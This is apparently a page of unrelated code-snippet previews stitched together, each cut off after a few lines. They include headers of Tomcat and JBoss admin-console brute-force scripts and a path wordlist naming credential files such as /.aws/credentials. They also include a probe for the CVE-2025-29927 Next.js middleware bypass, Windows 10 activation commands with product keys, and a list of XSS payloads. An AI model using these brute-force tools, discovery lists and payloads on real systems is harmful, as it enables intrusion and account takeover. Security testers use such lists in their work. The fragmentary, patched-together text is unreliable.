| """ | |
| Tomcat bruteforce | |
| Author: @itsecurityco | |
| """ | |
| import os | |
| import sys | |
| import getopt | |
| import base64 | |
| import requests |
| """ | |
| Bruteforce JBoss EAP Admin Console 1.3.4.SP6 (r999) | |
| Author: @itsecurityco | |
| Use: python bruteforce(PoC).py ip:port wordlist | |
| """ | |
| import re | |
| import sys | |
| import urllib | |
| import requests |
| #!/bin/bash | |
| bold="\e[1m" | |
| Underlined="\e[4m" | |
| red="\e[31m" | |
| green="\e[32m" | |
| blue="\e[34m" | |
| #grey="\e[90m" | |
| end="\e[0m" | |
| ugb="" |
| .git/HEAD | |
| .git/config | |
| .git/index | |
| .git/logs/HEAD | |
| /.DS_Store | |
| /.appveyor.yml | |
| /.arcconfig | |
| /.arcrc | |
| /.aws/credentials | |
| /.babelrc |
| #!/usr/bin/env zsh | |
| # reference | |
| # https://wordlists.assetnote.io/ | |
| # https://github.com/danielmiessler/SecLists/ | |
| # https://github.com/fuzzdb-project/fuzzdb | |
| BASE=( | |
| 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/common.txt' | |
| 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Common-DB-Backups.txt' | |
| 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Logins.fuzz.txt' |
| @ | |
| _ | |
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 04 | |
| 05 | |
| 06 |
| metadata: | |
| language: v2-beta | |
| name: "CVE-2025-29927 - Next.js middleware bypass" | |
| description: "Checks for differences in responses when using different x-middleware-subrequest header paths" | |
| author: "Chris Grieger - blueredix.com" | |
| tags: "next.js", "middleware" | |
| run for each: | |
| middleware_value = "pages/_middleware", | |
| "middleware", |
Run the following commands as root or user with sudo access to update the packages list and install the prerequisites: To install the Development Tools packages, run the following command as root or user with sudo privileges :
$ sudo apt update
$ sudo apt-get upgrade -y
$ sudo apt-get dist-upgrade -y
$ sudo apt-get install build-essential software-properties-common manpages-dev -y
$ sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
$ sudo apt-get update -y
| 1. Open CMD as Administrator | |
| 2. Paste the following commands into the Cmd: One by one, follow the order. | |
| cscript slmgr.vbs /ipk "SERIAL NUMBER HERE" | |
| Replace SERIAL NUMBER HER with any of these, according your Windows 10 installation type. | |
| Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 | |
| Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR | |
| Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH |
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |